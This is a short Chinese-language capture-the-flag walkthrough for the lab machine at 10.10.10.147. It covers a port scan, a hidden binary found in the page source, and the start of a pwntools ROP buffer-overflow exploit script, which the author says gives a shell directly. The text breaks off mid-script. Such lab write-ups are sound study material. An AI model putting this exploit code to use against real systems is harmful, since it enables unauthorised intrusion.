扫描
常规22和80端口。22想到ssh登录,80进去web搜集信息
没发现什么,web页面 ctrl+u 看前端源码发现 隐藏说可以下myapp
超纲的bof
下载
10.10.10.147/myapp
这明显是linux缓冲区溢出,但是难度远超oscp的,所以针对oscp备考者,不必要把时间浪费在这。而且考试似乎只考win的bof。如果你学有余力,倒可以多研究研究。
这段脚本可直接拿去用,直接拿shell。 但是前提要安装pwn库。专门的ctf库。可以参考这个,但过程可能因每人电脑里python安装情况等不同而各种报错。或许很难安装上。我也是搞了很久才莫名其妙的发现可以用了。。。
#!/usr/bin/env python
from pwn import *
context(os="linux", arch="amd64")
#context(log_level='DEBUG')
junk = "A"*120
got_puts = p64(0x404018)
plt_system = p64(0x401040)
pop_rdi = p64(0x40120b)
main = p64